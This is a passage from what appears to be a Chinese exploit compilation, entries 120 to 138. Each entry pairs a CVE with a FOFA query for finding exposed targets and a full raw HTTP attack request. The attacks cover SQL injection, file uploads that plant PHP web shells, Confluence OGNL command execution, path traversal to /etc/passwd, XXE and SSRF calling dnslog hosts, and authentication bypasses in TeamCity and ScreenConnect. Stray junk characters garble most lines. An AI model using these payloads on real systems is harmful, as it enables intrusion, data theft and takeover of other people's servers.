' c$ n+ C  j% o( ]/ y- \  YAccept-Encoding: gzip, deflate
; g, n$ Y  i  y4 I% k: C5 zContent-Type: application/x-www-form-urlencoded;" Y0 k: _0 c# t% S
Content-Length: 109. b9 x5 k/ C8 p$ Z, w8 \$ J# S6 e
Origin: https://58.18.133.60:8443
* A+ z" U7 H! t$ `: j: ]9 yReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
& t6 _* C. G$ k$ aSec-Fetch-Dest: empty" X+ A& G9 K6 y$ ^% L2 c( {
Sec-Fetch-Mode: cors
- ?4 o1 X* u2 ]Sec-Fetch-Site: same-origin6 K# z: w# B  x) s) X' s$ N- A
X-Forwarded-For: 1.1.1.1
8 x; @" ]8 n# B- [# l" VX-Originating-Ip: 1.1.1.1( @) a2 e. _7 t# N+ X( x
X-Remote-Ip: 1.1.1.11 V' A; ?5 W$ l9 Z8 n2 o
X-Remote-Addr: 1.1.1.1
( e6 ^9 k% O" D  }) a+ }# vTe: trailers
2 k  Y6 \/ q& Y. p6 b  `$ O" c1 sConnection: close- Y5 j9 |7 ?  z) [
$ g$ N6 B7 @; u3 g
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
$ Y' h1 V/ i- j2 X, v, `9 D" p8 c% A0 Y
7 d. h' _# [0 w6 }* g  _  ?/ D' E
120. 北京百绰智能S40管理平台导入web.php任意文件上传9 \% P  \# r  N
CVE-2024-1253
" \) U. K! O& ?5 TFOFA：title="Smart管理平台"
" @/ B- g3 Z9 ]# H) a( O2 ~POST /useratte/web.php? HTTP/1.1- o% \) O2 Z8 ]# Z7 N* x
Host: ip:port/ L1 _5 I: v  r3 s
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db& N: d0 O2 B' b+ r+ b/ W: c
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
) G; X& h) U* y) p1 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 b% }) h: Y( K9 e. D$ N6 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 I8 d/ f: \9 M1 ~( [+ {Accept-Encoding: gzip, deflate+ H9 d, T& E! l
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328/ c3 d, B! o+ J6 ?1 t- ~$ y& j
Content-Length: 597, v. v! ~- w5 t  X/ g
Origin: https://ip:port
! R: m- m6 z; V6 o% a6 oReferer: https://ip:port/sysmanage/licence.php
0 N2 W9 J' Q: W6 E! Y7 GUpgrade-Insecure-Requests: 19 s7 C6 W% R% S8 ?! f; u
Sec-Fetch-Dest: document$ U; S3 |  o9 M+ I# A; }! c( k" O* r
Sec-Fetch-Mode: navigate
& S, o. e& d: f3 `0 N# T2 nSec-Fetch-Site: same-origin" ^# R! q8 ~8 N! q( V3 w3 I4 W# k
Sec-Fetch-User: ?1
/ g4 G* ?. T$ Q/ y* W! M$ _Te: trailers' ]1 d! q& M3 \4 Y
Connection: close2 U( a# e( ~0 _6 l( J2 }2 H  ]! L
; m1 J, e: D1 O4 X7 @
-----------------------------423289041236658752706300793282 Q" P7 E; X7 p$ }
Content-Disposition: form-data; name="file_upload"; filename="2.php"# e& f5 `7 ]# @' v- a
Content-Type: application/octet-stream1 h0 h5 Z$ K/ z4 {5 e$ J2 e9 R
9 V# s! a, D* w6 ~! E! b
<?php phpinfo()?>0 }8 t1 A* j3 P2 h% u$ ~
-----------------------------42328904123665875270630079328! {& O9 ^! }( x( G0 B0 N$ B
Content-Disposition: form-data; name="id_type"6 I6 @9 j( L. i/ V
0 O1 c' R/ c& f
1
2 Y8 V' w9 c- r8 ~-----------------------------42328904123665875270630079328( `5 c. T( s$ p6 `% G
Content-Disposition: form-data; name="1_ck", I2 R" l; ^# o2 a* _" Y. `% K
! v6 C( j  G8 T) v/ _
1_radhttp) b8 O, |" }1 H4 ^$ N* q) a
-----------------------------423289041236658752706300793283 x* ]) }/ T3 k
Content-Disposition: form-data; name="mode"
2 I; m  [  Q/ p+ W2 I
1 p" e6 a9 c' Kimport$ ]9 U; W; j' G  A) }1 N* b. K3 Y  W
-----------------------------42328904123665875270630079328
, B; |$ {  }' ?  h) v, r1 W5 i: c$ ]6 t. j, D- e

+ ^2 Q+ N/ {, b* D3 N5 R文件路径/upload/2.php
* f& B. K9 X: `3 x, L: T2 v5 _5 [0 o& G7 L
121. 北京百绰智能S42管理平台userattestation.php任意文件上传' ]6 I" k9 c5 M1 _* q0 \# G4 h
CVE-2024-1918
/ E' }. n& y+ \1 p) BFOFA：title="Smart管理平台"
) w4 I$ ]* }6 j8 a6 ]+ }' y' n, `9 HPOST /useratte/userattestation.php HTTP/1.1; {! l( \3 E/ D7 L$ i# S
Host: 192.168.40.130:8443. Z/ n* N0 C5 P9 h& b3 e' f
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
7 _0 L1 n% G4 }User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
( S$ ?) T7 J; `; V, F/ U. t! qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 o9 m! ~9 }% v  \" K7 v0 W! @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ q/ P! m( l, w5 S- R/ qAccept-Encoding: gzip, deflate* x9 Z  _- H- Z
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328) R1 J% [9 t6 x( q
Content-Length: 5929 ]8 R7 D8 Y, g/ k) s
Origin: https://192.168.40.130:8443
  k, A7 G' r- TUpgrade-Insecure-Requests: 1
6 ^  ]! [, y7 g& O0 SSec-Fetch-Dest: document
$ p. i3 O) E. G7 U% t: f. DSec-Fetch-Mode: navigate
. |! _; ^3 O; e3 P0 jSec-Fetch-Site: same-origin
5 }' ?& r& H8 z0 lSec-Fetch-User: ?10 o7 h* z  x2 g, F' r' A
Te: trailers6 y$ p, ~+ ~0 P& X# c" w2 @# }
Connection: close* V- T* Z* v- s. D" U
$ e; F, z; i' ]2 ]. f( o# J
-----------------------------42328904123665875270630079328! @  ?5 |. q4 w* H
Content-Disposition: form-data; name="web_img"; filename="1.php"
! o6 y) Q3 c0 P7 ~1 }& w/ bContent-Type: application/octet-stream
! @+ Z, }+ X6 ]% w- x- w/ B2 h& C: g' ]8 N7 ^
<?php phpinfo();?>
% G/ @  c# _8 o! K; b: V' u& A-----------------------------423289041236658752706300793283 P2 i! E' Q# w& _2 @
Content-Disposition: form-data; name="id_type"$ A& H! R: }- C& }# ?* V* ~

) P( `" X/ c7 ~1 L% u( ^13 \& Y- c, Y! m7 q3 o( C
-----------------------------42328904123665875270630079328+ Q/ j0 |5 |& C, }; v. I( d% H' p
Content-Disposition: form-data; name="1_ck"
: T6 a, P1 b; W' @: _
2 p6 _4 g0 J! p4 x. b1_radhttp
; }4 n: X" B3 f, u8 M$ a-----------------------------42328904123665875270630079328
. H) y, v) L6 y% p* ?Content-Disposition: form-data; name="hidwel"9 ~# F, i; }. r$ E- V, @

# H' P& d3 D* a& ^4 y/ Dset; y$ c, {8 F- g$ i% @
-----------------------------42328904123665875270630079328& L7 o" f8 o9 D
7 {5 A' m+ a2 F/ ~

* ~8 B6 i! k7 n) Dboot/web/upload/weblogo/1.php
6 P/ }2 f! t" l5 l. n' f  f( i- k, [3 L. e; |3 a/ M. J
122. 北京百绰智能s200管理平台/importexport.php sql注入
0 K( q- p& H- H# r. @CVE-2024-27718FOFA：title="Smart管理平台"
0 G1 ^; W0 M/ F# S其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容，原文：sql=select 1,database(),version()8 e# x/ n5 ?  d# }+ C5 R
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1% v5 m) E' o( [: j
Host: x.x.x.x
! {: v1 \3 T) ?5 h6 O) ^Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
, h3 G' {8 K" p: Z  xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ D' r* l- H$ @4 ~7 w6 |" JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  q2 m: f7 M7 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 u- ^0 Q5 R# z1 g2 Y% d7 @
Accept-Encoding: gzip, deflate, br4 Q& W. ?) [) @% d5 _
Upgrade-Insecure-Requests: 13 m8 o: @* B; I+ ?8 \1 V9 y( d- @, M
Sec-Fetch-Dest: document
* O5 e" H6 j* }Sec-Fetch-Mode: navigate
5 \& ^* K# s& eSec-Fetch-Site: none
/ S) c% `' O5 J1 ^, V) M) Q: l! USec-Fetch-User: ?1
8 s( u8 x- c8 s9 L" v: m+ ~Te: trailers
) D; Y7 A1 Y  L1 L; B9 W! JConnection: close
0 b3 P6 ^) K1 n9 }, }( ]* M1 \( X
  W- K0 S6 V8 W+ q+ S6 o# n' m5 W. {; A; }; b
123. Atlassian Confluence 模板注入代码执行
; Q6 H) z3 T5 x* jFOFA：app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
! k, t3 }4 d: i/ xPOST /template/aui/text-inline.vm HTTP/1.1
: T4 I: E$ [7 O8 c; e7 mHost: localhost:80907 g& d+ ]: t7 S$ u
Accept-Encoding: gzip, deflate, br/ B* T2 D* }$ U' [( }  H1 O( k
Accept: */*
0 f8 _  \6 K3 @Accept-Language: en-US;q=0.9,en;q=0.85 I5 C) Y. B& N9 @  r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
' C# P! ]9 Y6 w  [( B, o! b. P( LConnection: close! W! X4 X' P1 V5 Y# U7 a) K
Content-Type: application/x-www-form-urlencoded7 B1 g  P' p1 {' v% g
/ q  x: r# b$ k: \6 x1 Z3 X; B; j
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))2 V0 I* r% ]7 n& A
' @' p8 C# i' j- ^' Z$ P
" |4 [3 n3 h; h
124. 湖南建研工程质量检测系统任意文件上传6 F9 t- K  Q* J3 l7 H
FOFA：body="/Content/Theme/Standard/webSite/login.css") L* d8 P) G& G* M
POST /Scripts/admintool?type=updatefile HTTP/1.1; g9 e$ L! [3 Q+ k" S5 w1 c
Host: 192.168.40.130:8282" B2 j2 ?. d8 \  t+ @
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
: `/ B4 w; P2 B1 K) [Content-Length: 72
: z, H& y6 t4 t$ H, ~) {! _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" J" b; j( D% z. x% j
Accept-Encoding: gzip, deflate, br
* k9 m% d( l3 d6 s. n6 ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; H$ c, b/ v9 Q7 ^# }: e3 h' HConnection: close- ~, m( n% K6 `8 g' F
Content-Type: application/x-www-form-urlencoded
6 e% l& x: K" m) q+ w# r' ^8 k. c, ^5 D
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
4 U2 o1 v! \& _" `0 |( o4 K+ Y% b6 v' e/ c( I& i; a
, ]; E$ L" q: S7 D9 b& R0 l
http://192.168.40.130:8282/Scripts/abcgcg.aspx+ J: A" J/ V. H
9 L3 k2 |2 R+ e1 V! }, Y+ |
125. ConnectWise ScreenConnect身份验证绕过
3 R7 _0 q( L- X3 |  hCVE-2024-1709
3 a& j8 N) B2 i0 {: d, p1 t) RFOFA：icon_hash="-82958153"
, u- M/ p6 \) n3 K2 h! [" vhttps://github.com/watchtowrlabs ... bypass-add-user-poc1 Y! U5 Z3 C9 R; Z& ~

9 Q: |8 a2 G0 k3 t3 x* t  U* C3 w; o  t$ x$ y9 G/ a- y2 y
使用方法1 N; S+ E% J* Q) b" \: F& @1 ~
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
! |9 W( ~8 p! L: r4 x# R1 O; O: {6 T* H+ k

0 W- u; V% q, h) |1 l% `. O, d, R创建好用户后直接登录后台，可以执行系统命令。
, H; H/ {; }" o7 ?5 b/ L- v6 o  {! C8 c  w: v
126. Aiohttp 路径遍历7 j( h, e% }& n7 S; D
FOFA：title=="ComfyUI"
1 E- Y1 X4 e5 m% GGET /static/../../../../../etc/passwd HTTP/1.1
' s* H# h+ z% W3 Y: s2 s& @) AHost: x.x.x.x; P+ O  L5 H9 T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close3 d1 R; c0 _1 i- _* a, h
Accept: */*
' ?( r( b2 a' g- ~7 g- J5 ?- dAccept-Language: en3 ~- D& e, A1 [8 @4 K6 B
Accept-Encoding: gzip. _. ?/ a: b" s3 Q

& E/ z: M! J) m: D4 d) C
1 c2 ?8 t( ?1 d. }6 m% K127. 广联达Linkworks DataExchange.ashx XXE
4 Y3 B( f- J( {; |9 _FOFA：body="Services/Identification/login.ashx"
# e+ u# h, m, L1 Z: kPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1& B# o( c- m9 X  T' Z
Host: 192.168.40.130:8888, t/ ~+ P0 @  D+ }: P  [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
/ }, }/ H' T1 w- L7 M& OContent-Length: 415
' k, H1 d3 H. j) G; O0 [6 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 c3 n+ u/ C0 l1 S& _1 Y/ G% X/ e$ ^
Accept-Encoding: gzip, deflate& l4 d) H% c+ p8 B2 i0 U
Accept-Language: zh-CN,zh;q=0.9: H+ L* T7 l) {! U. F/ }
Connection: close9 X3 p* x, }4 K* U. e: z
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0' h+ T1 v( w: U9 H
Purpose: prefetch2 k; R$ R0 e- J* ~$ B( H- ]1 ~
Sec-Purpose: prefetch;prerender0 e& m& @' I% {6 J2 T

; F( K" J! n( E- U; |" T1 _/ u- e: \------WebKitFormBoundaryJGgV5l5ta05yAIe0# C" {+ i* d$ u+ I, f( V- X0 ^
Content-Disposition: form-data;name="SystemName"
2 g% }8 Q0 S6 d5 C, z+ x/ `, g1 w  e5 t  Y" I
BIM; n% b. i4 x( I1 {( e
------WebKitFormBoundaryJGgV5l5ta05yAIe04 Q1 q% m* b" h0 K9 T8 ~0 p
Content-Disposition: form-data;name="Params"
8 n% r1 i" I9 Y& t( H9 tContent-Type: text/plain+ F3 w6 |$ Z3 R. `) |4 _
: j, ~  d: ]& R: A0 g
<?xml version="1.0" encoding="UTF-8"?>
6 n4 Q& D, q* ]0 t0 z<!DOCTYPE test [
! P3 K  l- v# Y<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">4 e, M5 Z; }2 H' Y
]1 k% k3 i' T( @% W, P  Z! F, I5 s2 x
>
) O4 Z9 T, d- |<test>&t;</test>
7 G- A- c( B) ]1 E8 Q, L4 {------WebKitFormBoundaryJGgV5l5ta05yAIe0--
0 S' m# B5 m, D7 C& `$ }% t; W- @" l& G# C3 U, g+ E0 Q: o
5 U. B1 T7 J) }! }5 I& C2 S

7 F& E, t( n* e' {" Y  u; o; a# n128. Adobe ColdFusion 反序列化
6 _$ D  s- |  b5 z' cCVE-2023-382039 U9 M' D1 Q* C1 z, p
Adobe ColdFusion版本2018u17（以及早期版本）、2021u7（以及早期版本）和2023u1（以及早期版本）
- o1 n! ]2 l% B$ h6 ^FOFA：app="Adobe-ColdFusion"4 \6 j( _. D- d, Y
PAYLOAD
) D' r' l) \% I
) |8 D, Q" T6 _" h( O5 _, S6 L8 ]129. Adobe ColdFusion 任意文件读取
$ \9 A' L- [/ ~& c8 {5 F7 C) yCVE-2024-20767% _3 o- Y; K( Q& a8 ~( N+ L2 v
FOFA：app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
+ N3 o# z  `5 y1 {; j第一步，获取uuid5 i/ ^% P8 B, r& O
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
6 ~. F* C/ n; {# ~! r( _Host: x.x.x.x
+ \6 w. `2 u  N- f2 i" H' y) I- EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* f6 W1 Q& n( F
Accept: */*! k, D7 K. J5 a9 J& P( M
Accept-Encoding: gzip, deflate, z  \" X2 y( i. e8 e" W
Connection: close  }9 y+ N8 R+ S" b7 R2 n
0 m% V5 F/ E5 @8 N
- p0 k9 ~% ^; ?' k2 y& w% \
第二步，读取/etc/passwd文件5 i5 G1 }! z" V  t
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
. g$ j& C2 K: Y+ W7 ?Host: x.x.x.x" b7 ?! E" V/ X  m3 U9 T) ~: K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* b- U& N$ }; I& @; eAccept: */*& m5 C  F7 [: Z8 E% f# H* d4 g& i* ]5 J
Accept-Encoding: gzip, deflate
* X( \7 v1 A1 z1 U! v* jConnection: close
* N& x7 L9 D* O) ~( Fuuid: 85f60018-a654-4410-a783-f81cbd5000b94 [( R2 C5 u; C( s8 {
$ ?5 s( s- y9 b. I

6 s, L& c9 z9 [  O0 W2 n% H! i& n2 y130. Laykefu客服系统任意文件上传
! n0 g; ~# c. X8 s4 A  Y. HFOFA：icon_hash="-334624619"6 F. R% X$ o- W4 n; y- `1 ?: {  [. K
POST /admin/users/upavatar.html HTTP/1.1- z* T" ^/ T5 J
Host: 127.0.0.1
3 Q: _% ^1 I1 Y/ I2 }" TAccept: application/json, text/javascript, */*; q=0.018 X* n  V& y* ~2 Z
X-Requested-With: XMLHttpRequest% w. [( k9 f+ u! [0 O6 K2 \4 @" x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.267 n- x/ l' E  Z3 c. R4 z; }
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
* n, f# r2 x7 V- g1 IAccept-Encoding: gzip, deflate
. o( L+ y  V& {7 H+ R) YAccept-Language: zh-CN,zh;q=0.9
, m2 Z. g% d3 G( _Cookie: user_name=1; user_id=3
6 B& Z  a, s1 Z0 B! \4 O! AConnection: close2 Z! E- z* F5 N8 {

8 b5 ~8 [4 }  i" l------WebKitFormBoundary3OCVBiwBVsNuB2kR
# Z3 Y9 s$ N2 i; yContent-Disposition: form-data; name="file"; filename="1.php"5 G( G, U* f/ z2 @; y
Content-Type: image/png
0 _! p3 X7 a, f) K
/ h. x  z5 ]7 ]<?php phpinfo();@eval($_POST['sec']);?>7 ?/ N1 h5 _, e! Q8 T0 v
------WebKitFormBoundary3OCVBiwBVsNuB2kR--! j0 ~2 k7 d9 T$ A. i! W$ b
4 F/ z0 f" ?1 h! J
( w/ ]8 P  W. m: M3 [& _
131. Mini-Tmall <=20231017 SQL注入
9 p1 y8 |7 t, ~FOFA：icon_hash="-2087517259", R8 b: G% z0 n% t' s  [
后台地址：http://localhost:8080/tmall/admin
' s. `, b0 v! b5 n  \, N9 O; Mhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)9 {/ Q0 V9 W5 a7 @- x
8 k2 H/ ^1 ]- `+ P, x
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
2 L( ?, r) {+ ^* YCVE-2024-27198
1 i- _( a, s1 y0 [- pFOFA：body="Log in to TeamCity"& t# A% g. ^2 N8 M4 r9 p
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
0 O" b8 g7 z# P1 p" L1 iHost: 192.168.40.130:8111
' d0 e* G# V2 S9 U* iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 X0 i6 }) n" w; g1 ?
Accept: */*! m- B; M5 ]( ^! @/ S
Content-Type: application/json
/ l4 o1 |9 f9 K3 L4 H. {Accept-Encoding: gzip, deflate# H! I* }  L1 H0 y# \* H; W/ o' v

( m9 i) y7 O8 m8 ~  _{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}) ]& R6 O8 f  R# L, W

& ]) S9 t& a* t; p( I
  {1 B3 t4 C, \+ {3 _, HCVE-2024-27199: T2 x+ X! h. D3 v9 _
/res/../admin/diagnostic.jsp1 k/ g1 M1 O  A: a% N* `
/.well-known/acme-challenge/../../admin/diagnostic.jsp
6 t4 r8 P( |- F' j# q/update/../admin/diagnostic.jsp
: R$ ?% p9 ~4 j. i, m: s! b0 s+ ]+ X4 t! t5 ?
* n: g7 }+ N% |
CVE-2024-27198-RCE.py
1 ~1 Y& _; V- E' e) p: w' }: \: ^$ |+ }
133. H5 云商城 file.php 文件上传# F' `- F8 g0 m# e( o+ x1 n1 x; E' ?
FOFA：body="/public/qbsp.php"1 G) j$ X# b$ x7 l
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
7 U- a6 ^+ E& \" |8 YHost: your-ip! F6 |* Y5 ]: g; v+ @5 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
9 A" |$ c1 q, r, AContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx& e/ R4 m: k6 G9 t
* C% a- t- w" S- T
------WebKitFormBoundaryFQqYtrIWb8iBxUCx" M3 I% v. {8 F
Content-Disposition: form-data; name="file"; filename="rce.php"
. r5 S2 }7 w. mContent-Type: application/octet-stream
3 J& A+ G& a( C/ @5 q
, K/ W! ]4 J' v* o( k& ?" ~<?php system("cat /etc/passwd");unlink(__FILE__);?>
+ ~  d# m5 A1 @1 Q8 z3 ]/ E. \8 r------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
3 m* ]% w8 H' D( G5 \5 U3 X  \% D( [4 t

' a) J, Q, d3 e& I1 {5 d3 }- t3 _& H( K  o% ?8 W" H
134. 网康NS-ASG应用安全网关index.php sql注入
$ g0 W. _2 a( w* ~7 X& QCVE-2024-2330
  d/ _1 ^4 t" r. B6 R0 B( DNetentsec NS-ASG Application Security Gateway 6.3版本# G$ Q  W  D9 S  ^% N; \" g
FOFA：app="网康科技-NS-ASG安全网关"
9 W( @3 o* r  U& F6 R/ ~POST /protocol/index.php HTTP/1.1$ d$ ^" ?9 `  c' ^- N: s( ^
Host: x.x.x.x
& X* K8 w" L; [! z8 P  T. j8 y# zCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
0 n# d/ O( g3 E$ Z: N9 w. hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.00 g% n. Q0 \9 c
Accept: */*
1 W8 t) q! f! `" _4 ~( t8 k( K, ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* z, f# X( C5 c- ]: t$ BAccept-Encoding: gzip, deflate
8 W" Y. I, J1 Q0 iSec-Fetch-Dest: empty
. N/ L4 i/ d' p4 v  g0 ]+ h/ ~Sec-Fetch-Mode: cors6 C7 Y: j: i$ Z
Sec-Fetch-Site: same-origin. u; c3 q% [8 R- D
Te: trailers/ R2 E' i; w( h& H( i/ M& r
Connection: close: s( h' X4 f/ t  K# o" w7 t
Content-Type: application/x-www-form-urlencoded" [% U: {2 W- d* f. q2 {: h
Content-Length: 263) R, k5 e4 K' r8 o  B' X

" }, W) ^3 H0 c: Q  S% `jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
3 f+ V2 Q; p5 u- N& ?8 |/ q) z
) R: M) S  E! K8 x( V9 z
4 _( ^; y  x# n# M0 r3 z5 ?( K135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入0 a7 b, m  ]2 @+ z# i1 \; P
CVE-2024-2022
6 o" v" [* x  I* t9 |Netentsec NS-ASG Application Security Gateway 6.3版本# _; @5 x! W+ _" c* U
FOFA：app="网康科技-NS-ASG安全网关"
5 v  B" O. @) w6 ]: eGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
, P9 U. c7 s' EHost: x.x.x.x
5 O/ U4 W' D# S: aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. N& }3 w' t( P5 ]" O3 ?7 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 x4 u6 D) r3 [8 M) m: R# S  m, u
Accept-Encoding: gzip, deflate; H0 b- R" X( s) j
Accept-Language: zh-CN,zh;q=0.9
* F: Q: T' k2 S) M4 k% yConnection: close
8 `' c* G1 [& A8 I$ e9 f7 i7 K  @2 f7 n3 P2 V" `/ f8 |

: T$ s7 D" r3 w9 k; Y8 n136. NextChat cors SSRF
4 q  i( {+ A9 B/ U- L! u+ `CVE-2023-497854 p  [$ r; j! S# T
FOFA：title="NextChat"
( U3 }/ a2 H; x) sGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
' }9 j5 q8 k! d+ a# _Host: x.x.x.x:100003 ?# |6 P- P0 n6 ~3 Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 Y0 X5 m  }) X; P5 e) Q9 ?
Connection: close
$ ?# @. M1 u7 i, W. I, UAccept: */*
3 @( }' Y: B2 w- z3 q2 Z! L$ {% p. DAccept-Language: en6 N1 E  \0 E0 G# ?9 b% n0 {
Accept-Encoding: gzip! H5 H3 j" S: `& m$ N8 n: j
( x6 Y. d- `9 m9 x' A. I& ^

) G6 F) z. F5 ?4 P% X) o137. 福建科立迅通信指挥调度平台down_file.php sql注入! W) _9 X7 l" n4 w) q7 ]
CVE-2024-26203 m, k' K' C0 T: {
FOFA：body="app/structure/departments.php" || app="指挥调度管理平台"7 |, w0 W3 m: }
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1/ t+ u( r3 D! V& f
Host: x.x.x.x
& k1 O0 {. j% O' l8 N! A7 j- eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! S- h1 `, ~; O8 v6 [8 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% b/ P1 u+ ~7 e. ~: @* K, O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 s! o$ _( s+ |* E1 I
Accept-Encoding: gzip, deflate, br% l7 N- l( d3 G( U+ b' C# }# N1 n6 p
Connection: close
- A5 R0 \4 |- D9 N1 v, {Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
" q( K) t4 ?& A2 ZUpgrade-Insecure-Requests: 1* _, P6 a( F, X; _+ G8 l
% x  C8 @3 N) D* ~6 l

, d% P! X% F  E138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
- k: R7 w- V  ?9 ]9 y, D' RCVE-2024-2621
1 P" z" y/ a  s1 E0 `FOFA：body="app/structure/departments.php" || app="指挥调度管理平台"
  l, U5 ^. @5 i+ D% }5 IGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1' |+ M" e, _$ A1 ]! U
Host: x.x.x.x% h$ @; L6 K/ ^9 ~; K$ c- F
